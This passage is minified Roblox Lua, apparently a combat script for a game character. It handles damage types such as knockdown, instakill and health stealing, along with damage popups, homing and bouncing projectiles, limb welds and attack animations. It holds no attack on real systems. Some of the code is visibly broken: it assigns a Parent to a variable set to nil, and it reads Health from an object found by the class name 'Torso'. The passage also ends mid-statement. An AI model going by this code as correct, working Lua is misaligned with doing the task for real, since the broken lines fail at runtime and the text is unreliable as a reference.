gb=Create("ParticleEmitter"){Color=ColorSequence.new(Color3.new(1,1,1),Color3.new(1,1,1)),Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(0.1,0),NumberSequenceKeypoint.new(0.3,0),NumberSequenceKeypoint.new(0.5,.2),NumberSequenceKeypoint.new(1,1)}),Size=NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(.15,1.5),NumberSequenceKeypoint.new(.75,1.5),NumberSequenceKeypoint.new(1,0)}),Texture="rbxassetid://936193661",Lifetime=NumberRange.new(1.5),Rate=100,VelocitySpread=0,Rotation=NumberRange.new(0),RotSpeed=NumberRange.new(-10,10),Speed=NumberRange.new(0),LightEmission=.25,LockedToPart=true,Acceleration=Vector3.new(0,-0,0),EmissionDirection="Top",Drag=4,ZOffset=1,Enabled=false}Damagefunc=function(Part,hit,gc,gd,ge,gf,gg,Delay,gh,gi)if hit.Parent==nil then return end;local h=hit.Parent:FindFirstChildOfClass("Torso")for U,v in pairs(hit.Parent:children())do if v:IsA("Torso")then if h.Health>0.0001 then h=v else end end end;if h==nil then return elseif h~=nil and h.Health<0.001 then return elseif h~=nil and h.Parent:FindFirstChild("Fly away")then return end;coroutine.resume(coroutine.create(function()if h.Health>9999999 and gc<9999 and gf~="IgnoreType"and(h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso"))and not h.Parent:FindFirstChild("Fly away")then local gj=Instance.new("Model",h.Parent)gj.Name="Fly away"game:GetService("Debris"):AddItem(gj,2.5)for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=true end end;wait(.25)if h.Parent:FindFirstChildOfClass("Body Colors")then h.Parent:FindFirstChildOfClass("Body Colors"):Destroy()end;local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")coroutine.resume(coroutine.create(function()local gl=Instance.new("Part")gl.Reflectance=0;gl.Transparency=1;gl.CanCollide=false;gl.Locked=true;gl.Anchored=true;gl.BrickColor=BrickColor.new("Really blue")gl.Name="YourGone"gl.Size=Vector3.new()gl.Material="SmoothPlastic"gl:BreakJoints()gl.Parent=gk;gl.CFrame=gk.CFrame;local gm=Instance.new("ParticleEmitter")gm.Parent=gl;gm.Acceleration=Vector3.new(0,0,0)gm.Size=NumberSequence.new({NumberSequenceKeypoint.new(0,10),NumberSequenceKeypoint.new(1,.0)})gm.Color=ColorSequence.new(Color3.new(1,0,0),Color3.new(1,0,0))gm.Lifetime=NumberRange.new(0.55,0.95)gm.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.25,.0),NumberSequenceKeypoint.new(1,1)})gm.Speed=NumberRange.new(0,0.0)gm.ZOffset=2;gm.Texture="rbxassetid://243660364"gm.RotSpeed=NumberRange.new(-0,0)gm.Rotation=NumberRange.new(-180,180)gm.Enabled=false;game:GetService("Debris"):AddItem(gl,3)for T=0,2,1 do gm:Emit(1)so("1448044156",gk,2,1)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(50,100)/1000)end end;wait(.2)end;wait(.1)gm:Emit(3)so("1448044156",gk,2,.8)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(100,200)/1000)end end end))wait(.1)end end))if h~=nil and hit.Parent~=Character and hit.Parent:FindFirstChild("Torso")or hit.Parent:FindFirstChild("UpperTorso")~=nil then if hit.Parent:findFirstChild("DebounceHit")~=nil and hit.Parent.DebounceHit.Value==true then return end;local c=Create("ObjectValue")({Name="creator",Value=game:service("Players").LocalPlayer,Parent=h})game:GetService("Debris"):AddItem(c,0.5)if gh~=nil and gi~=nil then so(gh,hit,1,gi)end;local Damage=math.random(gc,gd)local go=false;local gq=hit.Parent:findFirstChild("Block")if gq~=nil and gq.className=="IntValue"and gq.Value>0 then go=true;gq.Value=gq.Value-1;print(gq.Value)end;if go==false then h.Health=h.Health-Damage;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,2.5,Color3.new(0,0,0))else h.Health=h.Health-Damage/2;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,2.5,Color3.new(0,0,0))end;if gf=="Knockdown"then local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)wait(.2)gr.PlatformStand=false end),hum)local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gk.Position).lookVector*ge,Parent=hit})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,.2)game:GetService("Debris"):AddItem(gu,0.2)elseif gf=="Knockdown2"then local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)Combo=1;wait(.2)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gg.Position).lookVector*ge})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.2)game:GetService("Debris"):AddItem(gu,0.2)local gv=Create("BodyVelocity")({velocity=Vector3.new(0,60,0),P=5000,maxForce=Vector3.new(8000,12000,8000),Parent=RootPart})game:GetService("Debris"):AddItem(gv,0.1)elseif gf=="Normal"then local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gg.Position).lookVector*ge})if ge>0 then local gw=hit.Parent:FindFirstChild("Torso")or hit.Parent:FindFirstChild("UpperTorso")gn.Parent=gw end;game:GetService("Debris"):AddItem(gn,0.25)elseif gf=="Instakill"then coroutine.resume(coroutine.create(function()if(h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso"))and not h.Parent:FindFirstChild("Fly away")then local gj=Instance.new("Model",h.Parent)gj.Name="Fly away"game:GetService("Debris"):AddItem(gj,2.5)for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=true end end;wait(.25)if h.Parent:FindFirstChildOfClass("Body Colors")then h.Parent:FindFirstChildOfClass("Body Colors"):Destroy()end;local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")coroutine.resume(coroutine.create(function()local gl=Instance.new("Part")gl.Reflectance=0;gl.Transparency=1;gl.CanCollide=false;gl.Locked=true;gl.Anchored=true;gl.BrickColor=BrickColor.new("Really blue")gl.Name="YourGone"gl.Size=Vector3.new()gl.Material="SmoothPlastic"gl:BreakJoints()gl.Parent=gk;gl.CFrame=gk.CFrame;local gm=Instance.new("ParticleEmitter")gm.Parent=gl;gm.Acceleration=Vector3.new(0,0,0)gm.Size=NumberSequence.new({NumberSequenceKeypoint.new(0,10),NumberSequenceKeypoint.new(1,.0)})gm.Color=ColorSequence.new(Color3.new(1,0,0),Color3.new(1,0,0))gm.Lifetime=NumberRange.new(0.55,0.95)gm.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.25,.0),NumberSequenceKeypoint.new(1,1)})gm.Speed=NumberRange.new(0,0.0)gm.ZOffset=2;gm.Texture="rbxassetid://243660364"gm.RotSpeed=NumberRange.new(-0,0)gm.Rotation=NumberRange.new(-180,180)gm.Enabled=false;game:GetService("Debris"):AddItem(gl,3)for T=0,2,1 do gm:Emit(1)so("1448044156",gk,2,1)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(50,100)/1000)end end;wait(.2)end;wait(.1)gm:Emit(3)so("1448044156",gk,2,.8)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(100,200)/1000)end end end))wait(.1)end end))elseif gf=="HPSteal"then Humanoid.Health=Humanoid.Health+Damage;local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)Combo=1;wait(.2)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gg.Position).lookVector*ge})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.2)game:GetService("Debris"):AddItem(gu,0.2)local gv=Create("BodyVelocity")({velocity=Vector3.new(0,60,0),P=5000,maxForce=Vector3.new(8000,12000,8000),Parent=RootPart})game:GetService("Debris"):AddItem(gv,0.1)elseif gf=="Impale"then CFuncs.Sound.Create("http://www.roblox.com/asset/?id=268249319",Spike,.8,2)hit.Parent.Humanoid.PlatformStand=true;wait(1)hit.Parent.Humanoid.PlatformStand=false elseif gf=="IgnoreType"then elseif gf=="Up"then local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,0.1)local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,.1)elseif gf=="Snare"then local gy=Create("BodyPosition")({P=900,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")})game:GetService("Debris"):AddItem(gy,1)elseif gf=="Freeze2"then local gz=Create("BodyPosition")({P=50000,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})local gA=Create("BodyGyro")({maxTorque=Vector3.new(400000,400000,400000)*math.huge,P=20000,Parent=hit.Parent.Torso,cframe=hit.Parent.Torso.CFrame})hit.Parent.Torso.Anchored=true;coroutine.resume(coroutine.create(function(Part)wait(1.5)Part.Anchored=false end),hit.Parent.Torso)game:GetService("Debris"):AddItem(gz,3)game:GetService("Debris"):AddItem(gA,3)end;local gB=Create("BoolValue")({Name="DebounceHit",Parent=hit.Parent,Value=true})game:GetService("Debris"):AddItem(gB,Delay)c=Instance.new("ObjectValue")c.Name="creator"c.Value=Player;c.Parent=h;game:GetService("Debris"):AddItem(c,0.5)end end;ShowDamage=function(eS,gC,gD,Color)local eE=0.033333333333333;if not eS then local eS=Vector3.new(0,0,0)end;local gC=gC or""local gD=gD or 2;if not Color then local Color=Color3.new(1,0,1)end;local gE=CreatePart(workspace,"SmoothPlastic",0,1,BrickColor.new(Color),"Effect",Vector3.new(0,0,0))gE.Anchored=true;local gF=Create("BillboardGui")({Size=UDim2.new(2,0,2,0),Adornee=gE,Parent=gE})local gG=Create("TextLabel")({BackgroundTransparency=1,Size=UDim2.new(1,0,1,0),Text="DMG: "..gC.."",TextColor3=Color,TextScaled=true,Font=Enum.Font.ArialBold,Parent=gF})game.Debris:AddItem(gE,gD+0.1)gE.Parent=game:GetService("Workspace")delay(0,function()local gH=gD/eE;print(gH)gG.TextTransparency=0;gE.CFrame=CFrame.new(eS)wait()SetTween(gG,{TextTransparency=1},"Quad","In",gH/60)SetTween(gG,{Rotation=math.random(-25,25)},"Elastic","InOut",gH/60)SetTween(gG,{TextColor3=Color3.new(1,0,0)},"Elastic","InOut",gH/60)SetTween(gE,{CFrame=CFrame.new(eS)+Vector3.new(math.random(-5,5),math.random(1,5),math.random(-5,5))},"Linear","InOut",gH/60)wait(gH/60)if gE and gE.Parent then gE:Destroy()end end)end;MagniDamage=function(Part,gI,gJ,gK,gL,gM)local gf=""if mememode==true then gf="Instakill"else gf=gM end;if gM=="NormalKnockdown"then gf="Knockdown"end;for U,c in pairs(workspace:children())do local hum=c:FindFirstChild("Humanoid")for U,v in pairs(c:children())do if v:IsA("Humanoid")then hum=v end end;if hum~=nil then local head=c:findFirstChild("Head")if head~=nil then local gN=head.Position-Part.Position;local gO=gN.magnitude;if gO<=gI and c.Name~=Player.Name then Damagefunc(Part,head,gJ,gK,gL,gf,RootPart,0.1,"851453784",1.2)end end end end end;function CFMagniDamage(gP,gI,gJ,gK,gL,gf)local gQ=Instance.new("Part")gQ.Parent=Character;gQ.Size=Vector3.new(0.05,0.05,0.05)gQ.Transparency=1;gQ.CanCollide=false;gQ.Anchored=true;RemoveOutlines(gQ)gQ.Position=gQ.Position+Vector3.new(0,-.1,0)gQ.CFrame=gP;coroutine.resume(coroutine.create(function()MagniDamage(gQ,gI,gJ,gK,gL,gf)end))game:GetService("Debris"):AddItem(gQ,.05)gQ.Archivable=false end;function Reflect(gR,gS)return gR-2*gS:Dot(gR)*gS end;function ProjectileDmg(gT,gU,gV,gW,gX,gf,gY)if gW~=nil and gW.Parent:FindFirstChildOfClass("Humanoid")then coroutine.resume(coroutine.create(function()Damagefunc(gY,gW,gT,gU,gT,gf,RootPart,0.1,"851453784",1.2)end))else CFMagniDamage(CF(gV),gX,gT,gU,gT,gf)end end;function BulletHitEffectSpawn(gZ,g_)local h0=Instance.new("Part",Effects)h0.Reflectance=0;h0.Transparency=1;h0.CanCollide=false;h0.Locked=true;h0.Anchored=true;h0.BrickColor=BrickColor.new("Bright green")h0.Name="Bullet"h0.Size=Vector3.new(.05,.05,.05)h0.Material="Neon"h0:BreakJoints()h0.CFrame=gZ;local h1=Instance.new("Attachment",h0)game:GetService("Debris"):AddItem(h0,10)if g_=="Smoke1"then h1.Orientation=Vector3.new(90,0,0)local h2=EffectPack.Effect1:Clone()h2.Parent=h0;h2:Emit(100)game:GetService("Debris"):AddItem(h0,.5)end;if g_=="Smoke2"then h1.Orientation=Vector3.new(90,0,0)local h2=EffectPack.Fog:Clone()h2.Parent=h0;h2:Emit(100)game:GetService("Debris"):AddItem(h0,.75)end;if g_=="Smash1"then h1.Orientation=Vector3.new(90,0,0)local h2=EffectPack.Smash1:Clone()h2.Parent=h0;h2:Emit(10)game:GetService("Debris"):AddItem(h0,.75)end;if g_=="Smash2"then h1.Orientation=Vector3.new(90,0,0)local h2=EffectPack.Smash2:Clone()h2.Parent=h0;h2:Emit(1)game:GetService("Debris"):AddItem(h0,.5)end;if g_=="Explode"then h1.Orientation=Vector3.new(90,0,0)local h3=EffectPack.Explode_Fire_Effect:Clone()h3.Parent=h0;h3:Emit(50)local h4=EffectPack.Explode_Smoke2_Effect:Clone()h4.Parent=h0;h4:Emit(25)local h5=EffectPack.Explode_Smoke_Effect:Clone()h5.Parent=h0;h5:Emit(85)game:GetService("Debris"):AddItem(h0,2)end end;TargetMode1=nil;SelectedTarget1=nil;function SpawnBullet(h6,h7,h8,h9,ha,hb)coroutine.resume(coroutine.create(function()local hc=2;local f2=0;local hd=hb.Homing or false;local he=hb.NoGrav or 0;local hf=hb.Bounce or false;local hg=hb.BounceTimes or 0;local hh=hb.tail or nil;local hi=hb.BounceHitEffect or""local hj=hb.HitEffect or""if ha.Ball:FindFirstChild("Missile")and hd==false then ha.Ball:FindFirstChild("Missile"):Destroy()SetTween(ha.Ball,{Transparency=0},"Quad","InOut",.25)end;hg=hg-1;if hf==true and hg<.5 then hf=false end;if hf==true and h7<5.5 then hf=false end;if dS==true and mememode==true then f2=3 end;local speed=h7;local hk=h9;local hl=0;local hm=0;game:GetService("Debris"):AddItem(ha,30)ha.CFrame=h6;local hn=nil;Swait()if hd==true then end;for T=0,200 do if ha.Parent~=Effects then hn=workspace end;local ho=hd;if ho==true and T<25 then ho=false end;if ho==false and he==0 then if hm<.99 then hl=hl+1/10 elseif hm>.99 then hm=.99 end end;hm=hl/h8;if hn==nil then local hp=ha.Position;local hq=ha.CFrame;local hr,hs,hu=rayCast(ha.Position,ha.CFrame.lookVector,(speed-speed*hm+hk*hm)*4,Character)local hv=ha.Position-ha.CFrame.lookVector*-(speed-speed*hm+-hk*hm)local hx=hs;if hr~=nil then hn=hr;coroutine.resume(coroutine.create(function()end))local hy=ha.CFrame.LookVector;local hz=ha.CFrame.RightVector;local hA=ha.CFrame.UpVector;if hf==false then wait()if ha.Ball:FindFirstChild("Missile")then SetTween(ha.Ball.ragjoint,{C0=cf(0,0,0)*angles(math.rad(90),0,0)},"Elastic","Out",1.0)so(187259655,ha,5,1)BulletHitEffectSpawn(CF(hs,hs+hu),"Explode")for T=1,10 do local Color=hr.BrickColor;local hB=hr.Material;local hC=CFuncs.Part.Create(Effects,"SmoothPlastic",0,0,Color,"Ground",Vector3.new(math.random(50,100)/200,math.random(50,100)/200,math.random(50,100)/200))hC.Anchored=false;hC.Material=hB;hC.CanCollide=true;hC.Friction=0.1;hC.Velocity=Vector3.new(math.random(-50,50),math.random(25,50),math.random(-50,50))hC.CFrame=CF(hs,hs+hu)*cf(math.random(-250,250)/100,0.5,math.random(-250,250)/100)*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))game:GetService("Debris"):AddItem(hC,5)coroutine.resume(coroutine.create(function()wait(math.random(350,400)/100)hC.CanCollide=false end))end;for T=1,10 do local Color=hr.BrickColor;local hB=hr.Material;local hC=CFuncs.Part.Create(Effects,"SmoothPlastic",0,0,Color,"Ground",Vector3.new(math.random(25,50)/200,math.random(25,50)/200,math.random(25,50)/200))hC.Anchored=false;hC.Material=hB;hC.CanCollide=true;hC.Friction=0.1;hC.Velocity=Vector3.new(math.random(-50,50),math.random(25,50),math.random(-50,50))hC.CFrame=CF(hs,hs+hu)*cf(math.random(-250,250)/100,0.5,math.random(-250,250)/100)*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))game:GetService("Debris"):AddItem(hC,5)coroutine.resume(coroutine.create(function()wait(math.random(350,400)/100)hC.CanCollide=false end))end;ProjectileDmg(60,75,hs,nil,15,"Knockdown",ha)SetTween(ha,{CFrame=cf(hs,hs+hq.LookVector)*angles(0,0,0)},"Elastic","Out",1)coroutine.resume(coroutine.create(function()ha.Ball:FindFirstChild("Missile")["Rocket Thrust Loop"]:Stop()end))if hf==false then if ha.Ball:FindFirstChild("Missile")then for T,v3 in pairs(GatherAllInstances(ha.Ball:FindFirstChild("Missile")))do if v3:IsA("ParticleEmitter")then v3.Enabled=false end end;SetTween(ha.Ball:FindFirstChild("Missile"),{Transparency=1},"Quad","Out",1)game:GetService("Debris"):AddItem(ha.Ball:FindFirstChild("Missile"),2)end end else SetTween(ha,{CFrame=cf(hx,hv)*angles(0,0,0)},"Elastic","Out",1.0)BulletHitEffectSpawn(CF(hs,hs+hu),"Smoke2")SetTween(ha.Ball.ragjoint,{C0=cf(0,0,0)*angles(math.rad(90),0,0)},"Elastic","Out",1.0)so(138080614,ha,3,1)ProjectileDmg(20,25,hs,hr,8,"Knockdown",ha)end;SetTween(ha,{Transparency=1},"Elastic","InOut",1.5)else SetTween(ha.Ball.ragjoint,{C0=cf(0,0,0)*angles(math.rad(0),0,0)},"Elastic","Out",0.0)so(545219984,ha,2,1)ProjectileDmg(10,20,hs,hr,5,"Normal",ha)BulletHitEffectSpawn(CF(hs,hs+hu),"Smoke1")local hD=ha.CFrame.lookVector;ha.CFrame=cf(hs,hs+ha.Position)*angles(0,math.rad(0),0)end;Swait()if hf==true then local hE=(speed-speed*hm+hk*hm)/1.25;if he==1 then he=0;hE=speed end;Swait()local hF=CF(hp,hs+hu).lookVector;SpawnBullet(CF(ha.CFrame.p,hs+Reflect(hy,hu)),hE,h8,h9,ha,{Bounce=true,NoGrav=he,BounceTimes=hg,tail=hh})end;break else if hd==false and he==0 then SetTween(ha.Ball.ragjoint,{C0=ha.Ball.ragjoint.C0*angles(math.rad(-20),0,0)},"Linear","Out",.05)else SetTween(ha.Ball.ragjoint,{C0=cf(0,0,0)*angles(math.rad(-90),0,0)},"Elastic","Out",1.0)end;if TargetMode1=="nil"or TargetMode1==nil or ZT==false then hd=false end;if hd==false then if he~=0 then hm=0 end;SetTween(ha,{CFrame=cf(ha.CFrame.p,(ha.CFrame*cf(0,0,-speed)).p+Vector3.new(0,-hk*hm,0))*cf(0,0,-(speed-speed*hm)+-hk*hm)},"Linear","InOut",.1)else if T>25 then hm=0;coroutine.resume(coroutine.create(function()local gO=(ha.CFrame.p*VT(1,0,1)-SelectedTarget1.CFrame.p*VT(1,0,1)).magnitude;local hG=0;local hH=(ha.CFrame.p*VT(0,1,0)-SelectedTarget1.CFrame.p*VT(0,1,0)).magnitude;if gO<(h8*1+hH)/1.5 then hd=false;he=1 end;if hd==true then SetTween(ha,{CFrame=cf(ha.CFrame.p,ha.CFrame.p+CF(ha.CFrame.p*VT(1,0,1),SelectedTarget1.CFrame.p*VT(1,0,1)).lookVector)*cf(0,0,-speed*2)},"Linear","InOut",.2)else SetTween(ha,{CFrame=cf(ha.CFrame.p,ha.CFrame.p+CF(ha.CFrame.p*VT(1,1,1),SelectedTarget1.CFrame.p*VT(1,1,1)).lookVector)*cf(0,0,-speed/2)},"Linear","InOut",0)end end))else SetTween(ha,{CFrame=cf(ha.CFrame.p,(ha.CFrame*cf(0,0,-speed)).p+Vector3.new(0,-hk*hm,0))*cf(0,0,-(speed-speed*hm)+-hk*hm)},"Linear","InOut",.1)end end end;Swait()end end;if hf==false then coroutine.resume(coroutine.create(function()if hh~=nil then hh:Destroy()end end))wait(2)ha:Destroy()end;if hn==workspace or hn==nil then ha:Destroy()end end))end;local hI=weld(dT.Parent,dT.Part0,dT.Part1,dT.C0)hI.C1=dT.C1;hI.Name=dT.Name;local hJ=weld(Neck.Parent,Neck.Part0,Neck.Part1,Neck.C0)hJ.C1=Neck.C1;hJ.Name=Neck.Name;Head.Massless=true;local RW=weld(Torso,Torso,RightArm,cn(0,0,0))local LW=weld(Torso,Torso,LeftArm,cn(0,0,0))local RH=weld(Torso,Torso,RightLeg,cn(0,0,0))local LH=weld(Torso,Torso,LeftLeg,cn(0,0,0))RW.C1=cn(0,0.5,0)LW.C1=cn(0,0.5,0)RH.C1=cn(0,1,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))LH.C1=cn(0,1,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))SetTween(hI,{C0=RootCF*cn(0,0,0)},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*cn(0,0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=cn(1.5,0.5,-.0)},"Quad","InOut",0.1)SetTween(LW,{C0=cn(-1.5,0.5,-.0)},"Quad","InOut",0.1)SetTween(RH,{C0=cn(.5,-0.90,0)},"Quad","InOut",0.1)SetTween(LH,{C0=cn(-.5,-0.90,0)},"Quad","InOut",0.1)FaceTabel1={383877195,405140636,405140721,445372443,462728740,383876924,152629683,173846872,246990268}FaceTabel2={405140818,426079166,423831705,630518619,383876039,1207425293,192467476,173846500}function ScreamFace()coroutine.resume(coroutine.create(function()Head:FindFirstChild("face").Texture="rbxassetid://"..FaceTabel1[math.random(1,#FaceTabel1)]end))end;function fixface()if mememode==false and feral==false then coroutine.resume(coroutine.create(function()Head:FindFirstChild("face").Texture="rbxassetid://"..FaceTabel2[math.random(1,#FaceTabel2)]end))else coroutine.resume(coroutine.create(function()Head:FindFirstChild("face").Texture="rbxassetid://".."1908765569"end))end end;RootPart.Material="Metal"function Reload()dS=true;if math.random(1,2)==1 then so("457046954",Head,6,1)else so("457046999",Head,6,1)end;for T=1,20,.75 do Swait()local hK=math.random(-20,20)SetTween(hI,{C0=RootCF*cn(0,-T/80,-T/50)*angles(math.rad(-T+hK),math.rad(0),math.rad(math.random(-20,20)))},"Quad","Out",0.05)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-20+math.random(-40,40)),math.rad(0),math.rad(math.random(-20,20)))},"Quad","Out",0.05)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(math.random(-45,45)),math.rad(math.random(-45,45)),math.rad(90+math.random(-45,45)))},"Quad","Out",0.05)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(math.random(-45,45)),math.rad(math.random(-45,45)),math.rad(-90+math.random(-45,45)))},"Quad","Out",0.05)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-T*2+hK),math.rad(math.random(-15,15)),math.rad(10))},"Quad","Out",0.05)SetTween(LH,{C0=cn(-.5,-1,0)*angles(math.rad(-T*2+hK),math.rad(math.random(-15,15)),math.rad(-10))},"Quad","Out",0.05)ScreamFace()end;fixface()dS=false end;local hL=Instance.new("Attachment",RightArm)local hM=Instance.new("Attachment",LeftArm)hL.Position=vt(0,-0.5,0)hM.Position=vt(0,-0.5,0)EffectPack.RightParticle:Clone().Parent=hL;EffectPack.LeftParticle:Clone().Parent=hM;function DominusAttack1()dS=true;SetTween(hI,{C0=RootCF*cn(0,0,3+1*math.sin(dQ/8))*angles(math.rad(10+5*math.cos(dQ/8)),math.rad(0),math.rad(-40))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*cn(0,0,0)*angles(math.rad(-10+5*math.cos(dQ/8)),math.rad(0),math.rad(40))},"Quad","InOut",0.2)SetTween(RW,{C0=cn(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(90))},"Quad","Out",0.2)SetTween(LW,{C0=cn(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Quad","Out",0.2)SetTween(RH,{C0=cn(.5,-1,0)*angles(math.rad(-10+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=cn(-.5,-.5,-.3)*angles(math.rad(20+15*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.2)wait(.2)coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;hN.Transparency=1;hN.Size=vt(0,0,0)local hP=Mouse.Hit.p;so("152091932",hN,4,.8+math.random(-100,100)/1000)SetTween(hN,{Size=vt(5,5,5),Transparency=0},"Back","Out",.5)for T=1,6,0.1 do hN.CFrame=cf(hP+vt(0,100-100*T/6,0))Swait()end;so("152092074",hN,6,1+math.random(-100,100)/1000)hN.Attachment:FindFirstChildOfClass("ParticleEmitter").Enabled=false;SetTween(hN,{Size=vt(56,56,56),Transparency=1},"Back","Out",1)hN.Script.Disabled=false;hN.Val.Value=Character;Swait(1.5*30)hN:Destroy()end))for T=1,10 do coroutine.resume(coroutine.create(function()local hN=nil;hN.Parent=workspace;game:GetService("Debris"):AddItem(hN,10)local hO=Instance.new("Trail",hN)hN.CanCollide=false;hN.Anchored=true;local hP=Mouse.Hit.p;for T=1,6,0.1 do hN.CFrame=cf(hP+vt(0,100-100*T/6,0))Swait()end;local hQ=Instance.new("Attachment",hN)local 